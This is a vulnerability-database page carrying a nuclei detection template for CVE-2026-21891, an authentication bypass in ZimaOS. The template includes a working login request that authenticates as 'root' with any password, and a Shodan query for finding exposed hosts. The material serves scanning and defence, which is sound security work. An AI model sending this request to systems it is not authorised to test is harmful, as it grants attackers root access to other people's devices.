Lucene search
K

ZimaOS - Authentication Bypass

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

ZimaOS up to 1.5.0 has broken authentication allowing login with any password for system service accounts.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2026-21891
8 Jan 202615:00
circl
CNNVD
ZimaOS 安全漏洞
8 Jan 202600:00
cnnvd
CVE
CVE-2026-21891
8 Jan 202614:00
cve
Cvelist
CVE-2026-21891 ZimaOS has Authentication Bypass via System-Level Username
8 Jan 202614:00
cvelist
EUVD
EUVD-2026-1670
8 Jan 202614:00
euvd
NVD
CVE-2026-21891
8 Jan 202614:15
nvd
OSV
CVE-2026-21891 ZimaOS has Authentication Bypass via System-Level Username
8 Jan 202614:00
osv
Positive Technologies
PT-2026-2122
8 Jan 202600:00
ptsecurity
RedhatCVE
CVE-2026-21891
10 Jan 202605:40
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2026-21891
7 Mar 202600:00
vulncheck_kev
Rows per page
id: CVE-2026-21891

info:
  name: ZimaOS - Authentication Bypass
  author: DhiyaneshDk
  severity: critical
  description: |
    ZimaOS <= 1.5.0 contains a broken authentication caused by improper password validation for known system service accounts in the login function, letting attackers authenticate with any password for these accounts, exploit requires knowledge of common usernames.
  impact: |
    Attackers can gain authenticated access to system service accounts without valid passwords, potentially compromising the system.
  remediation: |
    Update to a fixed version when available or apply patches to properly validate passwords for system service accounts.
  reference:
    - https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4
    - https://nvd.nist.gov/vuln/detail/CVE-2026-21891
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 9.4
    cve-id: CVE-2026-21891
    cwe-id: CWE-287
    epss-score: 0.02169
    epss-percentile: 0.80077
    cpe: cpe:2.3:o:zimaspace:zimaos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"ZimaOS"
    product: zimaos
    vendor: zimaspace
  tags: cve,cve2026,zimaos,auth-bypass,broken-auth,vkev

http:
  - raw:
      - |
        POST /v1/users/login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json
        Origin: {{RootURL}}
        Referer: {{RootURL}}/

        {
          "username": "root",
          "password": "anything"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "success"
          - "username"
          - "created_at"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a004630440220476d7f2fb611f9f69a6222f2226624cafa4776acf618164b08bc452e46e0623f02202a74934dfe832127d2bc0bcd984a3c0b9ecef49075aa6a95aa694fce91d7b4e9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Feb 2026 08:39Current
6Medium risk
Vulners AI Score6
CVSS 3.19.4 - 9.8
EPSS0.02169
SSVC
11